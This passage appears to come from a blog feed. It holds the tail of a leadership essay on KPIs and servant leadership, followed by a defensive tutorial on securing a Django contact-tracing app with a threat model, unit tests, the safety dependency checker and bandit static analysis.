The CTO is happy when:

  • We do not ask questions but execute desires from top management quickly
  • We report numbers that make the CTO look good to other executives
  • We buy products and services from vendors the CTO has a tight relationship with

Our KPI’s should then be on speed of implementation, reporting progress through measurements that are easy to make change a lot but does not necessarily create competitive advantage for the company. Perhaps should a KPI also be number of LinkedIn contacts of the CTO associated with each vendor we choose. Obviously – this would be absurd. We are optimizing for the wrong objective function! We see that this type of opportunism is not only suboptimal, it is bordering on corruption.

If, on the other hand, we want to maximize our customer’s love of the services delivered by our organization, we would likely select other KPI’s. When would customers like our products more than those from our competitors?

  • Our products do not have a lot of vulnerabilities and can be trusted
  • Our products are reliable and exceed the expectations the customers have
  • Our risk mitigations are designed to stop harm to our customers
  • Our marketing messages make our customers feel good about our offerings
  • Our products and services are easy to use

Say that this is what we believe underpins making the vision of “most loved supplier” reality. What should we measure to help drive results? We need to make sure our products are trustworthy and reliable – so using quality and security metrics will make sense. We need to make sure our products exceed expectations; meaning we need to watch closely the feedback from customers and the market. We need to make our products very easy to use – measuring user behavior to see if actual use of our products match what we intended would be an important part of making up the full picture.

A lot of this cannot be achieved internally by one department or division alone. We need to sell this approach to the entire organization, from top management to marketing and sales, to engineering. Our sphere of influence needs to expand to make our vision reality. Selling does not necessarily come natural to our team members, so focusing on driving activity before driving results can be a reasonable approach. One way to do this is to look at time spent on working with other units to make sure we do not fall into the internal focus trap. So where the manager obsessed with output based KPI’s would see internal socialization as wasted time, the more relationship aware manager understands that this underpins the creation of business value.

Further, as we expect our team members to “sell our vision” to the organization, people will need support, not just performance push. We will get back to that.

The point of this is, we should not try to measure all the things possible, we need to prioritize, and track KPI’s that align closely with our vision for the future. And to do that, we must first define that vision clearly. It must be shared by everyone, understood, and felt to be “right”. To be effective it must align with our values, and it must align with the values of the organization. In that set of values, we find innovation and agility. A practice that causes dissonance between the values we identify with, and our daily work, leads to frustration. And that has unfortunately become very common, and perhaps it has gotten even worse after COVID due to less strategic focus and involvement?

Creating excellence through people

Leadership is about creating results through others. We cannot do that through one-sided focus on “productivity”. It does not matter if you do a lot of things, if those are not the right things to be done, or if the things we do are not done very well. A top-down management approach will often lead us into doing things without putting our hearts in it, without considering if they are the right things to do, if the measured numbers and reports are produced. That is an illusion of effectiveness.

An approach to leadership that seeks to balance organizational performance and human development is “situational leadership”. This term stems from work done in the 1970’s by academics, and has developed significantly since, but the main take-aways are:

  • Not every situation is most effectively managed with the same style of leadership
  • For long-term organizational performance we need to balance our focus on tasks and relationships

According to this leadership theory, a good leader develops “the competence and commitment of their people so they’re self-motivated rather than dependent on others for direction and guidance”.

It should be clear that an over-focus on task performance will run counter to this principle and can easily lead to micromanagement. Micro management is warranted when competence is very low but enthusiasm to learn is high, but in knowledge organizations primarily employing university graduates this is rarely the situation at hand. Micromanagement in knowledge organizations is counterproductive.

So what should a good leader do?

Ken Blanchard is one of the originators of situational leadership theory, and he has written many books in a semi-fictional style. His most well-known book from the 1980’s is a quick read called “The One-Minute Manager”. It is still a good read about management, for learning about motivation and driving human excellence. In this book he introduces the concept of the serving leader, with the acronym SERVE serving as a reminder of key management practices. The practices are summarized as follows:

  • See the future
  • Engage and develop others
  • Reinvent continuously
  • Value results and relationships
  • Embody the values of the organization

See the future: develop a compelling shared vision of the future

This is the precursor to strategy. How can we plan what actions to take if the direction is unclear? How can we expect people to pull in the same direction, if they have no shared model of what an ideal future looks like? Therefore, creating a vision needs to be a collaborative experience. It is also necessary that the responsibility for articulating a vision for a business unit, lies clearly with the top leader of that unit.

A good vision, whether for a team or an organization should consider the core values of the organization. The values say something about what the organization sees as important, valuable, worth striving for. All organizations have values, whether articulated or not. If they are not articulated, or they are simply “dormant” – somebody defined them, but they are not widely known or reflected upon, they provide no guidance. Start with the values.

An effective vision sets a clear direction. It describes a future ideal state, somewhere we want to go. That state must be compelling to the team, and something everyone agrees that we would like to achieve.

Having a compelling and shared vision makes everything easier. Prioritizing what is important becomes easier. Motivating both oneself and others is much easier. Seeing if the fruit of our work moves us closer to where we want to be, becomes easier. It is a common saying that visibility is important.

Engage and develop others

To accomplish something great together we need to learn, as an organization, and as individuals. Leaders must support development of people, and of good practice. How do we develop people, so that they feel that work is rewarding, and improve their competence in a way that supports the organization in reaching its goals as well? The first thing we need to do is to acknowledge that development and optimization requires time, trust, acknowledgement, support, and effort.

Excellence does not come from task performance alone, although much can be learned “on the job” as well. A good approach to competence management requires the ability to think about systems. An individual alone is complex, a system. A team adds more complexity, not to speak of a large organization, or our entire market. Even society as a whole is relevant to our development. We need to consider systemic effects if we are going to effectively engage and develop others. That means that we must consider if our result focus is interfering with our ability to drive positive development. We need to align our performance management efforts with our competence goals.

Human performance requires motivation. A large part of “engage and develop others” is thus related to motivational leadership. Research in competence management has taught us about many factors that contribute to the motivation of people at work. Key influencing factors are:

  • Task motivation: a desire to solve the problem at hand, intrinsic motivation for the work itself. This is a state we should strive for.
  • Confidence in own competence: the individual’s self-esteem as it relates to competence and knowledge at work and in a group
  • Perceived autonomy: ability and acceptance of independent influence and decision making
  • Perceived use of own competence: that the work to be done requires the skills and abilities of each person to be actively used
  • Clear expectations: a clear understanding of what is expected of output, behaviors and social interaction from colleagues, leaders, and other relationships
  • Time and resources for competence development and training
  • A culture of excellence: where everyone expects the best of everyone, and provides support to achieve that
  • Usefulness of the work – a desire to help the wider organization achieve its goals (again pointing back to the vision)

Leaders play a crucial role in optimizing the environment around the factors above. This can be done through organizational design (who do we hire), how we work together, how we select and work on tasks, how we coach and support one another, how we share our own knowledge, and how we provide feedback to each other.

This is very hard to do unless we trust each other and know each other more personally than what particular job skills we have or what we can read from a CV. The only way to foster that trust is to care deeply about other people, to care about their success in terms of what is important to them, as well as to care about their value and contributions to the social group at work as a whole.

Culture eats strategy for breakfast is an old saying, and it holds a lot of truth.

Reinvent continuously

We will not achieve our vision in a vacuum. We are exposed to both internal and external competitive pressures. Competition for resources, for relevance, and market forces that decide whether our desired future state is still the right goalpost to aim for. To be successful in moving into our ideal future, even when clouded by uncertainty, we must innovate. Without innovation, the competitive pressures will crush us (external threat) and our internal performance will dwindle due to destruction of motivation and achievability of our goal. Hence, innovation must be on every leader’s agenda.

To reinvent you need to learn. Therefore, every leader should make it a practice to learn new things. Not only about the topic of the work, such as information security for example, or about leadership itself. Leaders should learn about the things that matter to society, to the supply chain, to the organization, and to individuals. A lot of this learning can come from fiction, from cultural experiences and from hobbies. It is through the way we interact with the world we learn to understand the world. That means that to drive effective innovation, we should not be workaholics. System thinking requires system understanding, and that understanding cannot come entirely from an inside perspective.

Innovation means change. We do something new, and we take risks. Innovation means doing things we don’t know will work. If we want others to innovate, to drive practice forward, we need leaders who are brave. Failure must be expected, perhaps even celebrated if we learn from it. Failure is always seen as risky by people in an organization due to perceived expectations being successful, efficient, productive. It is important for leaders to show willingness to take risks, try new things, and fail in a transparent way that others can see when things do not go the way we want.

There are many ways to reinvent or innovate. It can happen at the individual level, as a group in a natural, non-directed way, or as a managed project. It is also important to make innovations visible, no matter what type of innovation we are talking about.

Reinvention can be about processes. It can also be about technologies, products. We should always work to improve our processes and ways of working. This means that people must be able to voice their opinions, as well as to experiment. If we talk about trying new ways of doing things, challenging each other’s thinking along the way, we improve the odds of success. To make this reality, it is important that we create a culture where people will speak their minds, and where those who make decisions think about the suggestions and concerns raised. Involvement only works when it is authentic. Experimentation takes time. If someone wants to try something new, discuss and agree on how much “extra time” is OK to spend on experimentation to drive things forward. Maximize time spent on driving creativity, efforts to create and test, and make evaluation easy. Innovation work is where agile shines, working software above extensive documentation. Or demonstration by “doing” above extensive KPI’s.

Value relationships and results

Results matter. But it is through our relationships we create our best results. Relationships drive improvement, innovation, motivation, and quality.

As a leader, take time to build strong relationships with others. Not only with your own leaders, or with your direct reports. Those are important, but so are other people. Those who use the work produced by your unit. Those who need to support your unit in creating results. For example, for an information security team, it is often necessary to get help from the IT helpdesk in handling security incidents. If you as a leader have a strong relationship with the leader of the helpdesk team, and some of the key helpdesk members, their willingness to help and make a real effort when the security team needs help, will be much higher. The same goes for the relationships between your team members, and people who work in adjacent teams that we interact with. Value your people’s efforts to build relationships within the unit, in the organization, and even externally.  Even if their day-to-day work is not about external contact to vendors or customers. Every employee is a brand ambassador, and a strong brand drives results across the whole organization, even in business support functions.

As a leader, you should try to encourage and support people’s efforts in building relationships. One can provide arenas such as cross-functional knowledge sharing, or break activities. One can think strategically on how we engage with other units through the work we do and choose ways of working that makes it easier to build relationships to other people. Those relationships create trust, and trust is the parent of collaboration. This way – relationships help us drive performance. They create results.

Valuing results is also very important. This often comes more natural to an organization driven by measurements and reporting. Showing acknowledgement of results help us improve motivation, trigger ideas for improvement, and further create a need for more collaboration. Through that result focus creates a need for relationship management.

  • Celebrate all wins – big and small
  • When things go wrong – appreciate what can be learned. That is a result too.
  • Evaluate results based on outcome, expectation, handling of challenges and effort.
  • We should value the way a result was achieved as much as the result itself.

Embody the values of the organization

Authenticity is key to trust. The actions of an organizations leaders is very visible to that leader’s direct reports, but also to others. A leader who acts in a way that does not harmonize with the organization’s values does not support achieving the vision.

Unauthenticity will drive mistrust. Nobody is willing to go beyond the bare minimum to follow a leader who acts as if he or she does not actually believe in the vision, in the agreed values. This boils down to “walk the way you talk”. If you talk about agility, but opt for micromanagement, this creates dissonance. If you say you want to empower people to innovate but discourage taking risks, little innovation will occur. Authenticity matters. This means not only trying to behave in accordance with the values of the organization superficially, but actively working to bring the system forward just as you expect others to.

Do you want people to innovate? Then you must innovate. Do you want people to share your vision? Then you must invite participation in its creation and how to articulate it. Do you want people to learn and develop? Then you must learn and develop. There is no better way to portray authenticity than letting people see the things you do. Actions reinforce words.

To embody the values of the organization is not only about the actions you take, but also about the expectations you set. If we want to build excellence, we should not tolerate long-term underperformance. But more importantly, we should not tolerate systematic behaviors that go contrary to our values. When underperformance manifests itself, or behaviors that go contrary to our vision, to our stated values, show up repeated, we must act.

In a culture where tasks are valued above relationships, where measurements count more than progress, underperformance is often met with punishment. No bonus, lower salary adjustments. Or firing the individual. While such measures have their place, they should not be the start of improvement. For a situation where people act differently than we would expect with a set vision, with our defined values, we must ask ourselves what the cause of this behavior is. For a leader the first question should be “is there something in the way I lead that would make people believe those undesired behaviors are tolerated, or even encouraged?”. Sometimes our actions have unintended consequences when interpreted by others.

The next question we should ask is if there are misaligned incentives driving the behaviors we see. Do we reward results in a way that practically force people to take shortcuts or actions we do not actually want to make our measurements hit target? This type of opportunism will often manifest itself when motivation is entirely extrinsic, and there is a mismatch in the interests between the agent (the employee) and the principal (the leader, or the organization).

If we want to identify the cause of the performance slip, or the non-productive behaviors, we can only achieve this through dialog. You as a leader must have a conversation with the person displaying these behaviors. This is a great opportunity for situational leadership. What approach is appropriate and effective in the current situation? Is it a directive style, where you tell the other person what to do? Is it a coaching and participating style, where you support self-reflection to enable the desired change? Warnings and disciplinary actions tend to be an extreme variant of directive leadership style, and if the lack of harmony with expected behavioral standards this can be necessary. We are then often talking about serious violations of norms, or code of conduct. Most often this is not the case, and a very directive approach can be counterproductive, especially if there is not a high level of trust already in the relationship between you and the person you are trying to help change his or her ways. The conclusion of this is that leadership is complex and more about people than it is about measurements. Using the SERVE principle as a guideline for how you think about leadership can be very helpful as it helps you balance focus between driving results and creating strong relationships to underpin the results.

Who supports the leader?

Being a leader can feel very lonely. That is not a good situation and is completely unnecessary. Leaders need support structures. Sometimes you will need to think about complex dilemmas, involving people you care about. Leaders must often make trade-offs between conflicting goals, desires and needs. To do this effectively we need support from those around us. The organization should provide some of that support, through leadership training, mentorship, management systems and through contact with other managers. Your own line manager should be available for discussing such issues. It can also be a very good idea to have a strong mentor to help you reflect on challenging situations.

You should pull necessary support from many sources. Leaders often try to portray themselves as someone with the answer to every question. They often keep the dilemmas hidden and deliver directives for execution. This can easily lead to micromanagement and suboptimal solutions. In many cases you can share the dilemma and have your people help sort out what should be done next instead of presenting them with a directive to execute. Remember – people have been hired for their talents, not as cogs in a wheel.

Another source of support is your friends and family. That support does not have to be “task related”. Simply taking time to have a good life and feel appreciated will make you a better leader. That helps you create results, both on your own, and through others.

Value work-life balance for yourself, and others. Long-term growth depends on it.

The take-away

  • It is your job to make sure there is a compelling vision articulated, shared by everyone
  • Hire the right people and support their development – professionally and as individuals
  • Improve things every day – innovation applies to processes, products and who we involve
  • Appreciate and support relationships at work, and make networking part of what you do
  • Live by the values you and your organization believe in. Be authentic, and build trust.
  • Take care of your mental and physical health – and help others do the same. This is work-life balance in practice.

Application security in Django projects

This is a quick blog post on how to remove some typical vulnerabilities in Django projects.

coffee shop interior
Even a coffee shop visitor registration app needs to take app security into account

The key aspects we are looking at are:

  • Threat modeling: thinking through what attackers could do
  • Secrets management with dotenv
  • Writing unit tests based on a threat model
  • Checking your dependencies with safety
  • Running static analysis with bandit

Threat model

The app we will use as an example here is a visitor registration app to help restaurants and bars with COVID-19 tracing. The app has the following key users:

  • SaaS administrator: access to funn administration of the app for multiple customers (restaurants and bars)
  • Location administrator: access to visitor lists for individual location
  • Personal user: register visits at participating locations, view their own visit history and control privacy settings
  • Unregistered user: register visits at participating locations, persistent browser session lasting 14 days

The source code for this app is available here: https://github.com/hakdo/besokslogg/.

We use the keywords of the STRIDE method to come up with quick attack scenarios and testable controls. Note that most of these controls will only be testable with custom tests for the application logic.

Attack typeScenarioTestable controls
SpoofingAttacker guesses passwordPassword strength requirement by Django (OK – framework code)

Lockout after 10 wrong consecutive attempts (need to implement in own code) (UNIT)
Tampering
RepudiationAttacker can claim not to have downloaded CSV file of all user visits.CSV export generates log that is not readable with the application user (UNIT)
Information disclosureAttacker abusing lack of access control to gain access to visitor list

Attacker steals cookie with MitM attack

Attacker steals cookie in XSS attack
Test that visitor lists cannot be accessed from view without being logged in as the dedicated service account. (UNIT)

Test that cookies are set with secure flag. (UNIT OR STATIC)

Test that cookies are set with HTTPOnly flag. (UNIT or STATIC)

Test that there are no unsafe injections in templates (STATIC)
Denial of serviceAttacker finds a parameter injection that crashes the applicationCheck that invalid parameters lead to a handled exception (cookies, form inputs, url parameters)
Elevation of privilegeAttacker gains SaaS administrator access through phishing.Check that SaaS administrator login requires a safe MFA pattern (UNIT or MANUAL)
Simple threat model for contact tracing app

Secrets management

Django projects get a lot of their settings from a settings.py file. This file includes sensitive information by default, such as a SECRET_KEY used to generate session cookies or sign web tokens, email configurations and so on. Obviously we don’t want to leak this information. Using python-dotenv is a practical way to deal with this. This package allows you to include a .env file with your secrets as environment variables, and then to include then into settings using os.getenv(‘name_of_variable’). This way the settings.py file will not contain any secrets. Remember to add your .env file to .gitignore to avoid pushing it to a repository. In addition, you should use different values for your development and production environment of all secrets.

from dotenv import load_dotenv
load_dotenv()

SECRET_KEY = os.environ.get('SECRET_KEY')

In the code snippet above, we see that SECRET_KEY is no longer exposed. Use the same technique for email server configuration and other sensitive data.

When deploying to production you need to set the environment variables in that environment using a suitable and secure manner to do it. You should avoid storing configurations in files on the server.

Unit tests

As we saw in the threat model, the typical way to fix a security issue is very similar to the typical way you would fix a bug.

  1. Identify the problem
  2. Identify a control that solves the problem
  3. Define a test case
  4. Implement the test and develop the control

In the visitor registration app, an issue we want to avoid is leaking visitor lists for a location. A control that avoids this is an authorisation check in the view that shows the visitor list. Here’s that code.

@login_required()
def visitorlist(request):
    alertmsg = ''
    try:
        thislocation = Location.objects.filter(service_account = request.user)[0]
        if thislocation:
            visits = Visit.objects.filter(location = thislocation).order_by('-arrival')
            chkdate = request.GET.get("chkdate", "")
            if chkdate:
                mydate = datetime.datetime.strptime(chkdate, "%Y-%m-%d")
                endtime = mydate + datetime.timedelta(days=1)
                visits = Visit.objects.filter(location = thislocation, arrival__gte=mydate, arrival__lte=endtime).order_by('-arrival')
                alertmsg = "Viser besøkende for " + mydate.strftime("%d.%m.%Y")
            return render(request, 'visitor/visitorlist.html', {'visits': visits, 'alertmsg': alertmsg})
    except:
        print('Visitor list failed - wrong service account or no service account')
        return redirect('logout')

Here we see that we first require the user to be logged in to visit this view, and then on line 5 we check to see if we have a location where the currently logged in user is registered as a service account. A service account in this app is what we called a “location administrator” in our role descriptions in the beginning of our blog post. It seems our code already implements the required security controls, but to prove that and to make sure we detect it if someone changes that code, we need to write a unit test.

We have written a test where we have 3 users created in the test suite.

class VisitorListAuthorizationTest(TestCase):

    def setUp(self):
        # Create three users
        user1= User.objects.create(username="user1", password="donkeykong2016")
        user2= User.objects.create(username="user2", password="donkeykong2017")
        user3= User.objects.create(username="user3", password="donkeykong2018")
        user1.save()
        user2.save()

        # Create two locations with assigned service accounts
        location1 = Location.objects.create(service_account=user1)
        location2 = Location.objects.create(service_account=user2)
        location1.save()
        location2.save()
    
    def test_return_code_for_user3_on_visitorlist_is_301(self):
        # Authenticate as user 3
        self.client.login(username='user3', password='donkeykong2018')
        response = self.client.get('/visitorlist/')
        self.assertTrue(response.status_code == 301)
    
    def test_redirect_url_for_user3_on_visitorlist_is_login(self):
        # Authenticate as user 3
        self.client.login(username='user3', password='donkeykong2018')
        response = self.client.get('/visitorlist/', follow=True)
        self.assertRedirects(response, '/login/?next=/visitorlist/', 301)
    
    def test_http_response_is_200_on_user1_get_visitorlist(self):
        self.client.login(username='user1', password='donkeykong2016')
        response = self.client.get('/visitorlist/', follow=True)
        self.assertEqual(response.status_code, 200)

Here we are testing that user3 (which is not assigned as “service account” for any location) will be redirected when visiting the /visitorlist/ url.

We are also testing that the security functionality does not break the user story success for the authorized user, user1, who is assigned as service account for location1.

Here we have checked that the wrong user cannot access the URL without getting redirected, and that it works for the allowed user. If someone changes the logic so that the ownership check is skipped, this test will break. If on the other hand, someone changes the URL configuration so that /visitorlist/ no longer points to this view, the test may or may not break. So being careful about changing the inputs required in tests is important.

Vulnerable open source libraries

According to companies selling scanner solutions for open source libraries, it is one of the most common security problems that people are using vulnerable and outdated libraries. It is definitely easy to get vulnerabilities this way, and as dependencies can be hard to trace manually, having a tool to do so is good. For Python the package safety is a good open source alternative to commercial tools. It is based on the NVD (National Vulnerability Database) from NIST. The database is run by pyup.io and is updated every month (free), or you can pay to get updates faster. If you have a high-stakes app it may pay off to go with a commercial option or to write your own dependency checker.

Running it is as easy as

safety check -r requirements.txt

This will check the dependencies in requirements.txt for known vulnerabilities and give a simple output in the terminal. It can be built into CI/CD pipelines too, as it can export vulnerabilities in multiple formats and also give exit status that can be used in automation.

Static analysis with bandit

Static analysis can check for known anti-patterns in code. A popular choice for looking for vulnerabilities in Python code is bandit. It will test for hardcoded passwords, weak crypto and many other things. It will not catch business logic flaws or architectural bad choices but it is a good help for avoiding pitfalls. Make sure you avoid scanning your virtual environment and tests, unless you want a very long report. Scanning your current project is simple:

bandit -r .

To avoid scanning certain paths, create a .bandit file with defined excludes:

[bandit]
exclude: ./venv/,./*/tests.py

This file will exclude the virtual environment in /venv and all files called “tests.py” in all subfolders of the project directory.

A false positive

Bandit doesn’t know the context of the methods and patterns you use. One of the rules it has is to check if you are using the module random in your code. This is a module is a standard Python modules but it is not cryptographically secure. In other words, creating hashing functions or generating certificates based on random numbers generated by it is a bad idea as crypto analysis could create realistic attacks on the products of such generators. Using the random module for non-security purposes on the other hand, is convenient and unproblematic. Our visitor log app does this, and then bandit tells us we did something naughty:

Test results:
        Issue: [B311:blacklist] Standard pseudo-random generators are not suitable for security/cryptographic purposes.
        Severity: Low   Confidence: High
        Location: ./visitor/views.py:59
        More Info: https://bandit.readthedocs.io/en/latest/blacklists/blacklist_calls.html#b311-random
     58          alco = ''
     59          valcode =  ''.join(random.choice(string.ascii_lowercase) for i in range(6)) 
     60          errmsg = ''    
 

What we see here is the check for cryptographically insecure random numbers. We are using it just to verify that a user knows what they are doing; deleting their own account. The app generates a 6-letter random code that the user has to repeat in text box to delete their account and all associated data. This is not security critical. We can then add a comment # nosec to the line in question, and the scanner will not report on this error again.

Things we will not catch

A static analyser will give you false positives, and there will be dangerous patterns it does not have tests for. There will be things in our threat model we have overlooked, and therefore missing security controls and test requirements. Open source libraries can have vulnerabilities that are not yet in the database used by our scanner tool. Such libraries can also in themselves be malicious by design, or because they have been compromised, and our checks will not catch that. Perhaps fuzzing could, but not always. In spite of this, simple tools like writing a few unit tests, and running some scanners, can remove a lot of weaknesses in an application. Building these into a solid CI/CD pipeline will take you a long way towards “secure by default”.